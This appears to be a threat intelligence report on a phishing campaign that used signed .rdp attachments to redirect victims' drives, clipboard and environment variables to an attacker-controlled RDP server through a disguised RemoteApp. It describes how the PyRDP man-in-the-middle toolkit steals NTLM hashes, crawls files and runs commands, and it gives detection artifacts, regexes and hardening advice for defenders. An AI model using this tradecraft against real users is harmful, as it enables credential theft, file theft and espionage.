The RDP is used for communication between the Terminal Server and Terminal Server Client. RDP works with the concept of “virtual channels” that are capable of carrying presentation data, keyboard/mouse activity, clipboard data, serial device information, and more. Given these capabilities, as an attack vector, RDP is commonly seen as a route for attackers in possession of valid victim credentials to gain full graphical user interface(GUI) access to a machine. However, the protocol supports other interesting capabilities that can facilitate less conventional attack techniques.
RDP Configuration Files
RDP has a number of properties that can be set to customize the behavior of a remote session (e.g., IP to connect to, display settings, certificate options). While most are familiar with configuring RDP sessions via a traditional GUI (mstsc.exe), these properties can also be defined in a configuration file with the .rdp extension which, when executed, achieves the same effect.
The following .rdp file was seen as an email attachment (SHA256): ba4d58f2c5903776fe47c92a0ec3297cc7b9c8fa16b3bf5f40b46242e7092b46
An excerpt of this .rdp file is displayed in Figure 3 with annotations describing some of the configuration settings.
When executed, this configuration file initiates an RDP connection to the malicious command-and-control (C2 or C&C) server eu-southeast-1-aws[.]govtr[.]cloud and redirects all drives, printers, COM ports, smart cards, WebAuthn requests (e.g., security key), clipboard, and point-of-sale (POS) devices to the C2 server.
The remoteapplicationmode parameter being set to 1 will switch the session from the “traditional” interactive GUI session to instead presenting the victim with only a part (application) of the RDP server. The RemoteApp, titled AWS Secure Storage Connection Stability Test v24091285697854, resides on the RDP server and is presented to the victim in a windowed popup. The icon used to represent this application (on the Windows taskbar for example) is defined by remoteapplicationicon. Windows environment variables %USERPROFILE%, %COMPUTERNAME%, and %USERDNSDOMAIN% are used as command-line arguments to the application. Due to the use of the property remoteapplicationexpandcmdline:i:0 , the Windows environment variables sent to the RDP server will be that of the client (aka victim), effectively performing initial reconnaissance upon connection.
Lastly, the signature property defines the encoded signature that signs the .rdp file. The signature used in this case was generated using Let’s Encrypt. Interestingly, the SSL certificate used to sign the file is issued for the domain the RDP connection is made to. For example, with SHA256: 1c1941b40718bf31ce190588beef9d941e217e6f64bd871f7aee921099a9d881.
Figure 4: Signature property within .rdp file
Tools like rdp_holiday can be used to decode the public certificate embedded within the file in Figure 4.
Figure 5: .rdp file parsed by rdp_holiday
The certificate is an SSL certificate issued for the domain the RDP connection is made to. This can be correlated with the RDP properties full_address / alternate_full_address.
alternate full address:s:eu-north-1-aws.ua-gov.cloud
full address:s:eu-north-1-aws.ua-gov.cloud
Figure 6: Remote Address RDP Proprties
.rdp files targeting other victims also exhibited similar certificate behavior.
In legitimate scenarios, an organization could sign RDP connections with SSL certificates tied to their organization’s certificate authority. Additionally, an organization could also disable execution of .rdp files from unsigned and unknown publishers. The corresponding GPO can be found under Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Connection Client -> Allow .rdp files from unknown publishers.
Figure 7: GPO policy for disabling unknown and unsigned .rdp file execution
The policy in Figure 7 can optionally further be coupled with the “Specify SHA1 Thumbprints of certificates representing trusted .rdp publishers” policy (within the same location) to add certificates as Trusted Publishers.
From an attacker’s perspective, existence of a signature allows the connection prompt to look less suspicious (i.e., without the usual yellow warning banner), as seen in Figure 8.
This RDP configuration approach is especially notable because it maps resources from both the adversary and victim machines:
This RemoteApp being presented resides on the adversary-controlled RDP server, not the client/victim machine.
The Windows environment variables are that of the client/victim that are forwarded to the RDP server as command-line arguments
Victim file system drives are forwarded and accessible as remote shares on the RDP server. Only the drives accessible to the victim-user initiating the RDP connection are accessible to the RDP server. The RDP server by default has the ability to read and write to the victim’s file system drives
Victim clipboard data is accessible to the RDP server. If the victim machine is running within a virtualized environment but shares its clipboard with the host machine in addition to the guest, the host’s clipboard will also be forwarded to the RDP server.
Keeping track of what activity happens on the victim and on the server in the case of an attacker-controlled RDP server helps assess the level of control the attacker has over the victim machine. A deeper understanding of the RDP protocol’s functionalities, particularly those related to resource redirection and RemoteApp execution, is crucial for analyzing tools like PyRDP. PyRDP operates within the defined parameters of the RDP protocol, leveraging its features rather than exploiting vulnerabilities. This makes understanding the nuances of RDP essential for comprehending PyRDP’s capabilities and potential impact.
More information on RDP parameters can be found here and here.
Resource Redirection
The campaign’s .rdp configuration file set several RDP session properties for the purpose of resource redirection.
RDP resource redirection enables the utilization of peripherals and devices connected to the local system within the remote desktop session, allowing access to resources such as:
Printers
Keyboards, mouse
Drives (hard drives, CD/DVD drives, etc.)
Serial ports
Hardware keys like Yubico (via smartcard and WebAuthn redirection)
Audio devices
Clipboards (for copy-pasting between local and remote systems)
Resource redirection in RDP is facilitated through Microsoft’s “virtual channels.” The communication happens via special RDP packets, called protocol data packets (PDU), that mirror changes between the victim and attacker machine as long as the connection is active. More information on virtual channels and PDU structures can be found in MS-RDPERP.
Typically, virtual channels employ encrypted communication streams. However, PyRDP is capable of capturing the initial RDP handshake sequences and hence decrypting the RDP communication streams.
Figure 9: Victim’s mapped-drives as seen on an attacker’s RDP server
Remote Programs / RemoteApps
RDP has an optional feature called RemoteApp programs, which are applications (RemoteApps) hosted on the remote server that behave like a windowed application on the client system, which in this case is a victim machine. This can make a malicious remote app seem like a local application to the victim machine without ever having to touch the victim machine’s disk.
Figure 10 is an example of the MS Paint application presented as a RemoteApp as seen by a test victim machine. The application does not exist on the victim machine but is presented to appear like a native application. Notice how there is no banner/top dock that indicates an RDP connection one would expect to see in an interactive session. The only indicator appears to be the RDP symbol on the taskbar.
Figure 10: RDP RemoteApp (MsPaint.exe) hosted on the RDP server, as seen on a test victim machine
All resources used by RemoteApp belong to that of the RDP server. Additionally, if victim drives are mapped to the RDP server, they are accessible by the RemoteApp as well.
PyRDP
While the use of a tool like PyRDP in this campaign cannot be confirmed, the automation capabilities it offers make it an attractive option worth diving deeper into. A closer look at PyRDP will illuminate how such a tool could be useful in this context.
PyRDP is an open-source, Python-based, man-in-the-middle (MiTM) RDP proxy toolkit designed for offensive engagements.
Figure 11: PyRDP as a MiTM tool
PyRDP operates by running on a host (MiTM server) and pointing it to a server running Windows RDP. Victims connect to the MiTM server with no indication of being connected to a relay server, while PyRDP seamlessly relays the connection to the final RDP server while providing enhanced capabilities over the connection, such as:
Stealing NTLM hashes of the credentials used to authenticate to the RDP server
Running commands on the RDP server after the user connects
Capturing the user’s clipboard
Enumerating mapped drives
Stream, record (video format), and session takeover
It’s important to note that, from our visibility, PyRDP does not exploit vulnerabilities or expose a new weakness. Instead, PyRDP gives granular control to the functionalities native to the RDP protocol.
Password Theft
PyRDP is capable of stealing passwords, regardless of whether Network Level Authentication (NLA) is enabled. In the case NLA is enabled, it will capture the NTLM hash via the NLA as seen in Figure 12. It does so by interrupting the original RDP connection sequence and completing part of it on its own, thereby allowing it to capture hashed credentials. The technique works in a similar way to Responder. More information about how PyRDP does this can be found here.
Figure 12: RDP server user NTLMv2 Hashes recorded by PyRDP during user authentication
Alternatively, if NLA is not enabled, PyRDP attempts to scan the codes it receives when a user tries to authenticate and convert them into virtual key codes, thereby “guessing” the supplied password. The authors of the tool refer to this as their “heuristic method” of detecting passwords.
Figure 13: Plaintext password detection without NLA
When the user authenticates to the RDP server, PyRDP captures these credentials used to login to the RDP server. In the event the RDP server is controlled by the adversary (e.g., in this campaign), this feature does not add much impact since the credentials captured belong to the actor-controlled RDP server. This capability becomes impactful, however, when an attacker attempts an MiTM attack where the end server is not owned by them.
It is worth noting that during setup, PyRDP allows credentials to be supplied by the attacker. These credentials are then used to authenticate to the RDP server. By doing so, the user does not need to be prompted for credentials and is directly presented with the RemoteApp instead. In the campaign, given that the username RDP property was empty, the RDP server was attacker-controlled, and the RemoteApp seemed to be core to the storyline of the operation, we suspect a tool like PyRDP was used to bypass the user authentication prompt to directly present the AWS Secure Storage Connection Stability Test v24091285697854 RemoteApp to the victim.
Finally, PyRDP automatically captures the RDP challenge during connection establishment. This enables RDP packets to be decrypted if raw network captures are available, revealing more granular details about the RDP session.
Command Execution
PyRDP allows for commands to be executed on the RDP server. However, it does not allow for command execution on the victim’s machine. At the time of deployment, commands to be executed can be supplied to PyRDP in the following ways:
MS-DOS (cmd.exe)
PowerShell commands
PowerShell scripts hosted on the PyRDP server file system
PyRDP executes the command by freezing/blocking the RDP session for a given amount of time, while the command executes in the background. To the user, it seems like the session froze. At the time of deploying the PyRDP MiTM server, the attacker specifies:
What command to execute (in one of the aforementioned three ways)
How long to block/freeze the user session for
How long the command will take to complete
PyRDP is capable of detecting user connections and disconnections to RDP sessions. However, it lacks the ability to detect user authentication to the RDP server. As a user may connect to an RDP session without immediately proceeding to account login, PyRDP cannot determine authentication status, thus requiring the attacker to estimate a waiting period following user connection (and preceding authentication) before executing commands. It also requires the attacker to define the duration for which the session is to be frozen during command execution, since PyRDP has no way of knowing when the command completes.
The example in Figure 14 relays incoming connections to an RDP server on 192.168.1.2. Upon connection, it then starts the calc.exe process on the RDP server 20 seconds after the user connects and freezes the user session for five seconds while the command executes.
A clever attacker can use this capability of PyRDP to plant malicious files on a redirected drive, even though it cannot directly run it on the victim machine. This could facilitate dropping malicious files in locations that allow for further persistent access (e.g., via DLL-sideloading, malware in startup locations). Defenders can hunt for this activity by monitoring file creations originating from mstsc.exe. We’ll dive deeper into practical detection strategies later in this post.
Clipboard Capture
PyRDP automatically captures the clipboard of the victim user for as long as the RDP connection is active. This is one point where the attacker’s control extends beyond the RDP server and onto the victim machine.
Note that if a user connects from a virtual environment (e.g., VMware) and the host machine’s clipboard is mapped to the virtual machine, it would also be forwarded to the RDP session. This can allow the attacker to capture clipboard content from the host and guest machine combined.
Scraping/Browsing Client Files
With file redirection enabled, PyRDP can crawl the target system and save all or specified folders to the MiTM server if instructed at setup using the --crawl option. If the --crawl option is not specified at setup, PyRDP will still capture files, but only those accessed by the user during the RDP session, such as environment files. During an active connection, an attacker can also connect to the live stream and freely browse the target system’s file system via the PyRDP-player GUI to download files (see Figure 15).
It is worth noting that while PyRDP does not explicitly present the ability to place files on the victim’s mapped drives, the RDP protocol itself does allow it. Should an adversary misuse that capability, it would be outside the scope of PyRDP.
Stream/Capture/Intercept RDP Sessions
PyRDP is capable of recording RDP sessions for later playback. An attacker can optionally stream each intercepted connection and thereafter connect to the stream port to interact with the live RDP connection. The attacker can also take control of the RDP server and perform actions on the target system. When an attacker takes control, the RDP connection hangs for the user, similar to when commands are executed when a user connects.
Streaming, if enabled with the -i option, defaults to TCP port 3000 (configurable). Live connections are streamed on a locally bound port, accessible via the included pyrdp-player script GUI. Upon completion of a connection, an .mp4 recording of the session can be produced by PyRDP.
This section focuses on collecting forensic information, hardening systems, and developing detections for RDP techniques used in the campaign.
Security detections detailed in this section are already integrated into the Google SecOps Enterprise+ platform. In addition, Google maintains similar proactive measures to protect Gmail and Google Workspace users.
Log Artifacts
Default Windows Machine
During testing, limited evidence was recovered on default Windows systems after drive redirection and RemoteApp interaction. In practice, it would be difficult to distinguish between a traditional RDP connection and one with drive redirection and/or RemoteApp usage on a default Windows system. From a forensic perspective, the following patterns are of moderate interest:
Creation of the following registry key upon connection, which gives insight into attacker server address and username used:
HKUS-1-5-21-4272539574-4060845865-869095189-1000SOFTWARE
MicrosoftTerminal Server ClientServers<attacker_IP_Address>
HKUS-1-5-21-4272539574-4060845865-869095189-1000SOFTWARE
MicrosoftTerminal Server ClientServers<attacker_server>UsernameHint:
"<username used for connection>"
The information contained in the Windows Event Logs (Microsoft-Windows-TerminalServices-RDPClient/Operational):
Event ID 1102: Logs attacker server IP address
Event ID 1027: Logs attacker server domain name
Event ID 1029: Logs username used to authenticate in format base64(sha256(username)).
Heightened Logging Windows Machine
With enhanced logging capabilities (e.g., Sysmon, Windows advanced audit logging, EDR), artifacts indicative of file write activity on the target system may be present. This was tested and validated using Sysmon file creation events (event ID 11).
Victim system drives can be mapped to the RDP server via RDP resource redirection, enabling both read and write operations. Tools such as PyRDP allow for crawling and downloading the entire file directory of the target system.
When files are written to the target system using RDP resource redirection, the originating process is observed to be C:Windowssystem32mstsc.exe. A retrospective analysis of a large set of representative data consisting of enhanced logs indicates that file write events originating from mstsc.exe are a common occurrence but display a pattern that could be excluded from alerting.
For example, multiple arbitrarily named terminal server-themed .tmp files following the regex pattern _TS[A-Z0-9]{4}.tmp(e.g., _TS4F12.tmp) are written to the user’s %APPDATA%/Local/Temp directory throughout the duration of the connection.
Additionally, several file writes and folder creations related to the protocol occur in the %APPDATA%/LocalMicrosoftTerminal Server Client directory.
Depending upon the RDP session, excluding these protocol-specific file writes could help manage the number of events to triage and spot potentially interesting ones. It’s worth noting that the Windows system by default will delete temporary folders from the remote computer upon logoff. This does not apply to the file operations on redirected drives.
Should file read activity be enabled, mstsc.exe-originating file reads could warrant suspicion. It is worth noting that file-read events by nature are noisy due to the way the Windows subsystem operates. Caution should be taken before enabling it.
.rdp File via Email
The .rdp configuration file within the campaign was observed being sent as an email attachment. While it’s not uncommon for IT administrators to send .rdp files over email, the presence of an external address in the attachment may be an indicator of compromise. The following regex patterns, when run against an organization’s file creation events, can indicate .rdp files being run directly from Outlook email attachments:
/\AppData\Local\Microsoft\Windows\(INetCache|Temporary Internet Files)
\Content.Outlook\[A-Z0-9]{8}\[^\]{1,255}.rdp$/
/\AppData\Local\Packages\Microsoft.Outlook_[a-zA-Z0-9]{1,50}\.{0,120}
\[^\]{1,80}.rdp$/
/\AppData\Local\Microsoft\Olk\Attachments\([^\]{1,50}\){0,5}[^\]
{1,80}.rdp$/
System Hardening
The following options could assist with hardening enterprise environments against RDP attack techniques.
Network-level blocking of outgoing RDP traffic to public IP addresses
Disable resource redirection via the Registry
Key: HKEY_LOCAL_MACHINESoftwareMicrosoftTerminal Server Client
Allow .rdp files from unknown publishers: Setting this to disable will not allow users to run unsigned .rdp files as well as ones from untrusted publishers.
Specify SHA1 Thumbprints of certificates representing trusted .rdp publishers: A way to add certificate SHA1s as trusted file publishers
Computer Configuration -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Session Host: Policies on enable/disabling
Resource redirection
Clipboard redirection
Forcing Network Level Authentication
Time limits for active/idle connections
Blocking .rdp file extension as email attachments
The applicability of these measures is subject to the nature of activity within a given environment and what is considered “normal” behavior.
YARA Rules
These YARA rules can be used to detect suspicious RDP configuration files that enable resource redirection and RemoteApps.
This campaign demonstrates how common tradecraft can be revitalized with alarming effectiveness through a modular approach. By combining mass emailing, resource redirection, and the creative sleight-of-hand use of RemoteApps, the actor could effectively leverage existing RDP techniques while leaving minimal forensic evidence. This combination of familiar techniques, deployed in an unconventional manner, proved remarkably effective, proving that the true danger of Rogue RDP lies not in the code, but in the con.
In this particular campaign, while control over the target system seems limited, the main capabilities revolve around file stealing, clipboard data capture, and access to environment variables. It is more likely this campaign was aimed at espionage and user manipulation during interaction. Lastly, this campaign once again underscores how readily available red teaming tools intended for education purposes are weaponized by malicious actors with harmful intentions.
Acknowledgments
Special thanks to: Van Ta, Steve Miller, Barry Vengerik, Lisa Karlsen, Andrew Thompson, Gabby Roncone, Geoff Ackerman, Nick Simonian, and Mike Stokkel.